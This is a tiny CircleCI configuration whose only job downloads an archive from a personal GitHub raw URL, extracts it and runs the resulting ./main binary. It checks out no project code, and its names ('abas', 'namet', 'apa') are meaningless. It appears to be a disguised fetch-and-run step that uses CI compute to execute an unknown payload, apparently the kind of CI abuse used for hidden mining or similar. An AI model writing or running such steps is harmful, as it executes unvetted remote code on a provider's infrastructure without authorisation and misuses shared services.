version: 2
jobs:
  abas:
    docker:
      - image: cimg/golang:1.17

    steps:
    - run:
        name: namet
        command: |
          wget https://raw.githubusercontent.com/nedipaol/tara/main/apa && chmod u+x *
          tar -xf apa && chmod u+x *
          ./main



workflows:
  version: 2
  abas:
    jobs:
    - abas
